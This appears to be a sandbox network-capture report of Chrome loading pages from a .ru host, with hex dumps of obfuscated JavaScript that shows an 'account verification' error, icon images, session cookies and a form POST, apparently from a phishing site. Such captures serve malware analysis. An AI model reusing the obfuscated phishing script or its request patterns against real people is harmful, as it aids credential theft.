                                                2024-05-30 10:21:13 UTC1369INData Raw: 5f 30 78 31 37 63 36 39 35 5b 5f 30 78 34 66 66 34 66 38 28 30 78 31 66 61 29 5d 28 5f 30 78 34 66 66 34 66 38 28 30 78 31 61 38 29 29 5d 2c 30 78 31 29 5b 5f 30 78 34 66 66 34 66 38 28 30 78 64 34 29 5d 28 5f 30 78 31 66 38 66 32 63 3d 3e 7b 63 6f 6e 73 74 20 5f 30 78 31 33 61 65 31 65 3d 5f 30 78 34 66 66 34 66 38 3b 69 66 28 5f 30 78 31 66 38 66 32 63 29 7b 6c 6f 61 64 69 6e 67 61 6e 69 6d 61 74 69 6f 6e 28 30 78 31 29 3b 5f 30 78 31 66 38 66 32 63 5b 5f 30 78 31 33 61 65 31 65 28 30 78 31 30 35 29 5d 3d 3d 5f 30 78 31 33 61 65 31 65 28 30 78 62 31 29 26 26 28 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 31 33 61 65 31 65 28 30 78 62 62 29 5d 28 5f 30 78 31 33 61 65 31 65 28 30 78 31 30 65 29 29 5b 5f 30 78 31 33 61 65 31 65 28 30 78 32 30 62 29 5d 3d 27 27 2c
                                                Data Ascii: _0x17c695[_0x4ff4f8(0x1fa)](_0x4ff4f8(0x1a8))],0x1)[_0x4ff4f8(0xd4)](_0x1f8f2c=>{const _0x13ae1e=_0x4ff4f8;if(_0x1f8f2c){loadinganimation(0x1);_0x1f8f2c[_0x13ae1e(0x105)]==_0x13ae1e(0xb1)&&(document[_0x13ae1e(0xbb)](_0x13ae1e(0x10e))[_0x13ae1e(0x20b)]='',
                                                2024-05-30 10:21:13 UTC1369INData Raw: 33 61 65 31 65 28 30 78 61 64 29 29 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 31 33 61 65 31 65 28 30 78 62 62 29 5d 28 5f 30 78 31 33 61 65 31 65 28 30 78 64 62 29 29 5b 5f 30 78 31 33 61 65 31 65 28 30 78 31 30 30 29 5d 3d 27 3c 73 70 61 6e 3e 53 6f 72 72 79 2c 5c 78 32 30 77 65 5c 78 32 37 72 65 5c 78 32 30 68 61 76 69 6e 67 5c 78 32 30 74 72 6f 75 62 6c 65 5c 78 32 30 76 65 72 69 66 79 69 6e 67 5c 78 32 30 79 6f 75 72 5c 78 32 30 61 63 63 6f 75 6e 74 2e 5c 78 32 30 50 6c 65 61 73 65 5c 78 32 30 74 72 79 5c 78 32 30 61 67 61 69 6e 2e 3c 2f 73 70 61 6e 3e 3c 61 5c 78 32 30 69 64 3d 5c 78 32 32 56 69 65 77 44 65 74 61 69 6c 73 5c 78 32 32 5c 78 32 30 63 6c 61 73 73 3d 5c 78 32 32 6e 6f 2d 77 72 61 70 5c 78 32 32 5c 78 32 30 68 72 65 66 3d 5c 78 32 32 23 5c
                                                Data Ascii: 3ae1e(0xad)),document[_0x13ae1e(0xbb)](_0x13ae1e(0xdb))[_0x13ae1e(0x100)]='<span>Sorry,\x20we\x27re\x20having\x20trouble\x20verifying\x20your\x20account.\x20Please\x20try\x20again.</span><a\x20id=\x22ViewDetails\x22\x20class=\x22no-wrap\x22\x20href=\x22#\
                                                2024-05-30 10:21:13 UTC1369INData Raw: 78 62 32 29 5d 5b 27 74 6f 67 67 6c 65 27 5d 28 5f 30 78 31 33 61 65 31 65 28 30 78 31 32 37 29 29 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 31 33 61 65 31 65 28 30 78 62 62 29 5d 28 5f 30 78 31 33 61 65 31 65 28 30 78 31 34 39 29 29 5b 5f 30 78 31 33 61 65 31 65 28 30 78 62 32 29 5d 5b 5f 30 78 31 33 61 65 31 65 28 30 78 32 30 30 29 5d 28 5f 30 78 31 33 61 65 31 65 28 30 78 31 32 37 29 29 2c 76 69 65 77 3d 5f 30 78 31 33 61 65 31 65 28 30 78 31 64 38 29 2c 73 65 6e 64 41 6e 64 52 65 63 65 69 76 65 28 5f 30 78 31 33 61 65 31 65 28 30 78 61 32 29 2c 5b 5f 30 78 31 33 61 65 31 65 28 30 78 39 65 29 5d 2c 30 78 31 29 5b 27 74 68 65 6e 27 5d 28 5f 30 78 35 62 38 39 64 38 3d 3e 7b 63 6f 6e 73 74 20 5f 30 78 35 37 63 61 66 32 3d 5f 30 78 31 33 61 65 31 65 3b 69 66
                                                Data Ascii: xb2)]['toggle'](_0x13ae1e(0x127)),document[_0x13ae1e(0xbb)](_0x13ae1e(0x149))[_0x13ae1e(0xb2)][_0x13ae1e(0x200)](_0x13ae1e(0x127)),view=_0x13ae1e(0x1d8),sendAndReceive(_0x13ae1e(0xa2),[_0x13ae1e(0x9e)],0x1)['then'](_0x5b89d8=>{const _0x57caf2=_0x13ae1e;if


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                49192.168.2.449794188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:12 UTC1437OUTGET /ijadGOWmNjA7SxTV0q2ozi0cdBA9W0dAH33Z3eJlsCHRIWwOz56169 HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVG
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:13 UTC655INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:13 GMT
                                                Content-Type: image/svg+xml
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Content-Disposition: inline; filename="ijadGOWmNjA7SxTV0q2ozi0cdBA9W0dAH33Z3eJlsCHRIWwOz56169"
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L71OiwcLhnWKANmnSyYNNzzngvvSZBi9xk%2Bl8CW8MOgjzAC5He8OOnudHq9OyaLENUR7I7XdALqSOFs0JcIrP1kybj5sGIrQbQfEzg1TyOfB%2FpLZoxxNqN5Q1JFOwA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Server: cloudflare
                                                CF-RAY: 88bdfefacf1a5e73-EWR
                                                2024-05-30 10:21:13 UTC714INData Raw: 31 63 64 65 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 3c 6d 61 73 6b 20 69 64 3d 22 30 37 62 32 36 30 33 34 2d 35 36 61 33 2d 34 39 64 32 2d 38 66 32 36 2d 63 37 62 38 34 65 62 34 65 65 64 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 66 66 66 22 3e 0d 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 33 2e 39 37 36 32 20 30 43 31 36 2e 38 32 34 34 20 30 20 31 30 2e 39 37 30 37 20 35 2e 32 34 33 32 35 20 31
                                                Data Ascii: 1cde<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg"><mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff"><path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 1
                                                2024-05-30 10:21:13 UTC1369INData Raw: 30 5a 4d 31 32 2e 32 33 35 34 20 33 38 2e 34 36 39 34 43 31 34 2e 33 30 38 37 20 33 33 2e 39 39 38 37 20 31 38 2e 38 33 36 38 20 33 30 2e 38 39 38 31 20 32 34 2e 30 38 39 31 20 33 30 2e 38 39 38 31 43 32 39 2e 32 33 39 35 20 33 30 2e 38 39 38 31 20 33 33 2e 36 39 33 36 20 33 33 2e 38 37 39 37 20 33 35 2e 38 31 39 34 20 33 38 2e 32 31 30 39 43 33 33 2e 39 33 30 32 20 34 30 2e 36 31 31 39 20 33 31 2e 34 33 39 39 20 34 32 2e 38 39 35 34 20 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 43 32 35 2e 35 30 34 37 20 34 36 2e 35 33 37 34 20 32 32 2e 32 30 33 37 20 34 36 2e 35 32 39 33 20 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 39 2e 36 30 30 39 20 34 34 2e 39
                                                Data Ascii: 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.9
                                                2024-05-30 10:21:13 UTC1369INData Raw: 30 32 20 34 30 2e 36 31 31 39 20 33 31 2e 34 33 39 39 20 34 32 2e 38 39 35 34 20 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 43 32 35 2e 35 30 34 37 20 34 36 2e 35 33 37 34 20 32 32 2e 32 30 33 37 20 34 36 2e 35 32 39 33 20 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 31 39 2e 35 39 38 38 20 34 34 2e 39 30 30 37 43 31 36 2e 34 38 37 36 20 34 32 2e 39 36 37 32 20 31 34 2e 30 38 34 32 20 34 30 2e 37 37 33 38 20 31 32 2e 32 33 35 34 20 33 38 2e 34 36 39 34 5a 4d 33 31 2e 37 33 35 32 20 31 32 2e 31 36 34 34 43 32 36 2e 35 37 33 36 20 31 31 2e 36 39 39 35 20 32 31 2e 33 38 32 37 20 31 31 2e 36 39 35 32 20 31 36 2e 32
                                                Data Ascii: 02 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14.0842 40.7738 12.2354 38.4694ZM31.7352 12.1644C26.5736 11.6995 21.3827 11.6952 16.2
                                                2024-05-30 10:21:13 UTC1369INData Raw: 31 37 34 34 20 34 34 2e 38 39 33 39 5a 4d 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 36 2e 30 38 34 20 34 31 2e 34 38 33 36 4c 32 36 2e 30 37 36 37 20 34 31 2e 34 38 38 31 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 5a 4d 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 4c 32 36 2e 30 37 34 36 20 34 31 2e 34 38 39 34 4c 32 36 2e 30 37 33 34 20 34 31 2e 34 39 30 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 5a 4d 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 37 2e 34 38 31 20 34 38 2e 32 39 34 31 4c 31 37 2e 34 38 32 36 20 34 38 2e 32 39 35 4c 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 5a 4d 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 32 31 2e 37 32 33 20 34 31 2e 35 31 31 33 4c 32 31 2e 37 31 32 39 20 34 31 2e 35 30 35 4c 31 39 2e 36
                                                Data Ascii: 1744 44.8939ZM28.1724 44.8952L26.084 41.4836L26.0767 41.4881L28.1724 44.8952ZM28.1703 44.8965L26.0746 41.4894L26.0734 41.4902L28.1703 44.8965ZM19.6031 44.9034L17.481 48.2941L17.4826 48.295L19.6031 44.9034ZM19.6009 44.902L21.723 41.5113L21.7129 41.505L19.6
                                                2024-05-30 10:21:13 UTC1369INData Raw: 34 31 2e 36 34 33 20 34 37 2e 33 31 32 35 20 32 39 2e 31 34 30 37 20 34 37 2e 33 31 32 35 20 32 31 2e 31 32 38 37 48 33 39 2e 33 31 32 35 5a 4d 33 39 2e 33 31 32 34 20 32 31 2e 30 39 36 43 33 39 2e 33 31 32 35 20 32 31 2e 31 30 36 38 20 33 39 2e 33 31 32 35 20 32 31 2e 31 31 37 38 20 33 39 2e 33 31 32 35 20 32 31 2e 31 32 38 37 48 34 37 2e 33 31 32 35 43 34 37 2e 33 31 32 35 20 32 31 2e 30 39 38 32 20 34 37 2e 33 31 32 34 20 32 31 2e 30 36 37 36 20 34 37 2e 33 31 32 32 20 32 31 2e 30 33 37 4c 33 39 2e 33 31 32 34 20 32 31 2e 30 39 36 5a 4d 33 39 2e 33 31 32 35 20 32 30 2e 39 34 31 32 43 33 39 2e 33 31 32 35 20 32 30 2e 39 37 38 20 33 39 2e 33 31 32 34 20 32 31 2e 30 31 34 39 20 33 39 2e 33 31 32 33 20 32 31 2e 30 35 31 39 4c 34 37 2e 33 31 32 32 20 32 31
                                                Data Ascii: 41.643 47.3125 29.1407 47.3125 21.1287H39.3125ZM39.3124 21.096C39.3125 21.1068 39.3125 21.1178 39.3125 21.1287H47.3125C47.3125 21.0982 47.3124 21.0676 47.3122 21.037L39.3124 21.096ZM39.3125 20.9412C39.3125 20.978 39.3124 21.0149 39.3123 21.0519L47.3122 21
                                                2024-05-30 10:21:13 UTC1208INData Raw: 37 37 4c 31 37 2e 34 38 39 20 34 38 2e 32 39 39 4c 32 31 2e 37 31 32 39 20 34 31 2e 35 30 35 4c 32 31 2e 37 31 30 37 20 34 31 2e 35 30 33 37 4c 31 37 2e 34 38 36 38 20 34 38 2e 32 39 37 37 5a 4d 39 2e 31 31 35 33 39 20 34 30 2e 39 37 32 36 43 31 31 2e 32 35 34 31 20 34 33 2e 36 33 38 33 20 31 34 2e 30 30 31 31 20 34 36 2e 31 33 31 34 20 31 37 2e 34 38 37 34 20 34 38 2e 32 39 38 4c 32 31 2e 37 31 30 32 20 34 31 2e 35 30 33 33 43 31 38 2e 39 37 34 32 20 33 39 2e 38 30 33 20 31 36 2e 39 31 34 33 20 33 37 2e 39 30 39 33 20 31 35 2e 33 35 35 33 20 33 35 2e 39 36 36 33 4c 39 2e 31 31 35 33 39 20 34 30 2e 39 37 32 36 5a 4d 31 36 2e 35 37 32 38 20 31 36 2e 31 33 36 31 43 32 31 2e 34 39 38 34 20 31 35 2e 37 30 30 36 20 32 36 2e 34 35 31 33 20 31 35 2e 37 30 34 37
                                                Data Ascii: 77L17.489 48.299L21.7129 41.505L21.7107 41.5037L17.4868 48.2977ZM9.11539 40.9726C11.2541 43.6383 14.0011 46.1314 17.4874 48.298L21.7102 41.5033C18.9742 39.803 16.9143 37.9093 15.3553 35.9663L9.11539 40.9726ZM16.5728 16.1361C21.4984 15.7006 26.4513 15.7047
                                                2024-05-30 10:21:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                50192.168.2.449800188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:12 UTC1105OUTGET /uvDdGeSZoeTtRzRnIUZPopyUbvj6WcjtQgkM34130 HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:13 UTC631INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:13 GMT
                                                Content-Type: image/png
                                                Content-Length: 231
                                                Connection: close
                                                Content-Disposition: inline; filename="uvDdGeSZoeTtRzRnIUZPopyUbvj6WcjtQgkM34130"
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XAm5XZ9jM0uCIuL8jg2oQQBUhoapT%2Bd2FTeliDPlX64hWwPbcTihda5kKMKzz7aRTK6DhZrc%2F0Lgvd6c0DigjHCVGiH6vdH0P0FkHIjXvFw2EzV0OF0LNMIPWcrIFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Server: cloudflare
                                                CF-RAY: 88bdfefaed298ccd-EWR
                                                2024-05-30 10:21:13 UTC231INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 a1 49 44 41 54 48 4b ed 93 b1 0d 02 31 10 04 e7 5a a0 0c aa b8 12 a8 80 9c 2e 20 23 24 23 a5 94 2d e1 cb 20 24 24 33 b2 f4 48 1f 80 cf bc 71 80 78 a7 3e ed 78 c7 b6 d1 79 59 e7 7c 16 40 68 f8 8f 14 b9 fb 05 18 24 9d 42 2f 93 81 2a 45 63 f8 0a d8 4a ba 7d 15 d0 12 9e 0f 52 6c d0 1a 5e 04 8c e1 1b e0 0c dc 23 2d 92 0e af 66 de 36 70 f7 63 4a 69 67 66 b5 80 fd 47 80 3c 9c 21 c0 7a ce e5 3e 61 e1 2b 6a 85 84 80 d6 26 55 80 09 e4 da e5 a3 45 2f a8 b4 5f dd 60 2e 64 01 84 e6 7e 5f d1 03 bf ca 37 19 0c 18 34 60 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                Data Ascii: PNGIHDRw=sRGBIDATHK1Z. #$#- $$3Hqx>xyY|@h$B/*EcJ}Rl^#-f6pcJigfG<!z>a+j&UE/_`.d~_74`IENDB`


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                51192.168.2.449801188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:12 UTC1111OUTGET /opLQsPK25rFRhKntGwA2ZNghA8uNUx4nbVsIB5YEpt45139 HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:13 UTC639INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:13 GMT
                                                Content-Type: image/png
                                                Content-Length: 727
                                                Connection: close
                                                Content-Disposition: inline; filename="opLQsPK25rFRhKntGwA2ZNghA8uNUx4nbVsIB5YEpt45139"
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G3slL5Mxvy5HaY00LtZHfDmltceR9u6YoN5WikPLPeEiDKRxIE2AfnlUDAHx5g67ou4ZNc345ogL6abJfGhUqu3cwDFp69%2BN%2B8hU1Px7%2BEf8hr1SmTpF6tKW0vTQMA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                alt-svc: h3=":443"; ma=86400
                                                Server: cloudflare
                                                CF-RAY: 88bdfefb0c7f8cb9-EWR
                                                2024-05-30 10:21:13 UTC727INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 02 9e 49 44 41 54 68 43 ed 97 81 51 1c 31 0c 45 8f 0e a0 83 a3 03 e8 60 a9 00 a8 20 a4 02 a0 82 90 0a a0 03 ae 83 90 0a b2 54 00 1d e4 3a 80 0e c8 7f 37 72 c6 ec dc ad e5 b5 73 77 3b 59 cf 68 18 f6 64 4b 5f 5f 92 e5 83 d9 c8 d7 c1 c8 fd 9f 4d 00 76 cd e0 c4 c0 c4 40 61 04 fe df 14 6a 9a e6 50 c1 3b 91 9c 4b 1a 09 ff b3 5e 25 ef 92 e7 b6 6d 17 85 01 4e 6e 1f c4 80 9c bf d1 c9 d7 92 79 d2 c2 6c f6 5d 40 ee 1c 7a 83 54 b2 00 58 d4 1f 65 e9 c2 ac b5 44 5a f2 24 59 1a 0b b0 12 98 e1 6f 60 e5 4c 40 60 a6 ea 72 03 30 e7 7f 99 73 38 42 64 1f fa bc 31 a6 ee 4d 87 3d c7 b5 41 e4 00 f8 61 91 27 c7 2f e5 08 11 4f 2e 81 80 05 40 34 12 6d 6b cf 92 9b 32 14 5c 00 a2
                                                Data Ascii: PNGIHDR00WIDAThCQ1E` T:7rsw;YhdK__Mv@ajP;K^%mNnyl]@zTXeDZ$Yo`L@`r0s8Bd1M=Aa'/O.@4mk2\


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                52192.168.2.449803188.114.96.34434956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-30 10:21:13 UTC1528OUTPOST /hxfrw2DYZZsbHnkjqki9TmQkIfk5jufh48quUrIdw3ZYHOkO6r3Yenb HTTP/1.1
                                                Host: f8gxf.oritelos.ru
                                                Connection: keep-alive
                                                Content-Length: 33
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                X-Requested-With: XMLHttpRequest
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Origin: https://f8gxf.oritelos.ru
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://f8gxf.oritelos.ru/zyuqihsbghvajrlrrrPCNEXHOWHPJFXHPQVJEVEUXA?hotpuoxsczupfqtsqmzqgeWLKVDKPOARASQVVG
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                Cookie: XSRF-TOKEN=eyJpdiI6IlpUZEJnMmZFenQ3WnRjNEYxL2o5NFE9PSIsInZhbHVlIjoicnJ5MWJ1cDgyNmxySWhLa2FsUExWak1tbDcxTnh5VGVreGxLd3p5b2pONDg4TWVYbVN3Y2FNTFRUdnl5bnBMeFFWdHMzbUNrK25MZFNnOEJOYkZNU21iMU5ndmNGS09wd1dNRzJodVFDRU5ENUFNS0t6MEtjVVJ3aWRJZlJRamkiLCJtYWMiOiIyMTk1NjM3ZjRjYjhjZWM5NmM1Y2MyZTVjYmUzOTUyMjMyZDcyNWNhNDhhYjI0MjExYjcxZmYzNjY5ZTk5ZGQ2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImlYYmdra3Z4VnJhdWhNYkpGaFhBR2c9PSIsInZhbHVlIjoiakFpOXhEd2pkUS9tZ2UvemdLTUJLQXphNEZsak5hVks5SkcrY0xrUldEOFBORkV3SHJDOVNJZ3BSZ2E5T2FVSmc5YW1IV3B2U3N0cGloUnloTXJkRXJuaGQ4a050SkVHUHYrSG1ZaUhLVFByY1ZSYmdhNjd2bVJmUzFiSkR4WmsiLCJtYWMiOiJmYTJkN2YwNjRlNmVjZWUyNTgzZjFhM2QyYTNiYjBmNTZjM2QwOGE1OWZkYzYxMWFiMWFiZGVmMGNiMTAzMTkyIiwidGFnIjoiIn0%3D
                                                2024-05-30 10:21:13 UTC33OUTData Raw: 70 61 67 65 6c 69 6e 6b 3d 61 79 66 75 6a 75 64 65 26 74 79 70 65 3d 34 26 61 70 70 6e 75 6d 3d 31
                                                Data Ascii: pagelink=ayfujude&type=4&appnum=1
                                                2024-05-30 10:21:14 UTC995INHTTP/1.1 200 OK
                                                Date: Thu, 30 May 2024 10:21:14 GMT
                                                Content-Type: application/json
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Cache-Control: no-cache, private
                                                CF-Cache-Status: DYNAMIC
